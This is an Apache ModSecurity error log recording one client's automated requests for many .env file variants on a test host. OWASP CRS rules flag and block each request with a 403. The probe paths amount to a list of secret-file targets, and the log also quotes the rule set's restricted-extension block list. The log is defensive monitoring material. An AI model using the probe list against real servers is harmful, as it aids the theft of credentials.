[Wed Feb 19 05:52:57.237246 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqwAAAAc"]
[Wed Feb 19 05:52:57.237526 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqwAAAAc"]
[Wed Feb 19 05:52:57.237877 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqwAAAAc"]
[Wed Feb 19 05:52:57.238376 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqwAAAAc"]
[Wed Feb 19 05:52:57.261994 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrAAAAAc"]
[Wed Feb 19 05:52:57.262551 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrAAAAAc"]
[Wed Feb 19 05:52:57.263087 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrAAAAAc"]
[Wed Feb 19 05:52:57.263556 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrAAAAAc"]
[Wed Feb 19 05:52:57.286835 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrQAAAAc"]
[Wed Feb 19 05:52:57.287223 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrQAAAAc"]
[Wed Feb 19 05:52:57.287668 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrQAAAAc"]
[Wed Feb 19 05:52:57.311082 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrgAAAAc"]
[Wed Feb 19 05:52:57.311492 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrgAAAAc"]
[Wed Feb 19 05:52:57.312012 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrgAAAAc"]
[Wed Feb 19 05:52:57.335153 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrwAAAAc"]
[Wed Feb 19 05:52:57.335529 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrwAAAAc"]
[Wed Feb 19 05:52:57.336027 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z7VjqbfTDZoQXGqhAzbFrwAAAAc"]
[Wed Feb 19 05:52:57.422339 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsAAAAAc"]
[Wed Feb 19 05:52:57.422757 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsAAAAAc"]
[Wed Feb 19 05:52:57.423305 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsAAAAAc"]
[Wed Feb 19 05:52:57.471179 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsQAAAAc"]
[Wed Feb 19 05:52:57.471576 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsQAAAAc"]
[Wed Feb 19 05:52:57.472049 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsQAAAAc"]
[Wed Feb 19 05:52:57.516131 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsgAAAAc"]
[Wed Feb 19 05:52:57.516587 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsgAAAAc"]
[Wed Feb 19 05:52:57.517148 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z7VjqbfTDZoQXGqhAzbFsgAAAAc"]
[Wed Feb 19 05:52:57.544520 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7VjqbfTDZoQXGqhAzbFswAAAAc"]
[Wed Feb 19 05:52:57.544949 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7VjqbfTDZoQXGqhAzbFswAAAAc"]
[Wed Feb 19 05:52:57.545481 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7VjqbfTDZoQXGqhAzbFswAAAAc"]
[Wed Feb 19 05:52:57.580973 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtAAAAAc"]
[Wed Feb 19 05:52:57.581372 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtAAAAAc"]
[Wed Feb 19 05:52:57.581844 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtAAAAAc"]
[Wed Feb 19 05:52:57.615490 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.travis"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtQAAAAc"]
[Wed Feb 19 05:52:57.615919 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtQAAAAc"]
[Wed Feb 19 05:52:57.616391 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtQAAAAc"]
[Wed Feb 19 05:52:57.659598 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtgAAAAc"]
[Wed Feb 19 05:52:57.659979 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtgAAAAc"]
[Wed Feb 19 05:52:57.660521 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z7VjqbfTDZoQXGqhAzbFtgAAAAc"]
